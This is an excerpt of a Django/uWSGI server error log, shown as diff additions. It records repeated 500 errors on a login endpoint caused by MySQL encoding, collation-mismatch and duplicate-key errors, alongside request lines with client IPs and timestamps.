+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 756/994] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:15 2021] POST /login/ => generated 209870 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 757/995] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:16 2021] POST /login/ => generated 183377 bytes in 97 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 758/996] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:36:17 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 759/997] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:36:18 2021] GET /home/ => generated 7863 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 2069|app: 0|req: 760/998] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:26 2021] POST /login/ => generated 208507 bytes in 139 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 2069|app: 0|req: 761/999] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:28 2021] POST /login/ => generated 208507 bytes in 143 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 2069|app: 0|req: 762/1000] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:28 2021] POST /login/ => generated 208507 bytes in 130 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+...The work of process 2069 is done. Seeya!
+worker 1 killed successfully (pid: 2069)
+Respawned uWSGI worker 1 (new pid: 11057)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 763/1001] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:29 2021] POST /login/ => generated 208507 bytes in 270 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
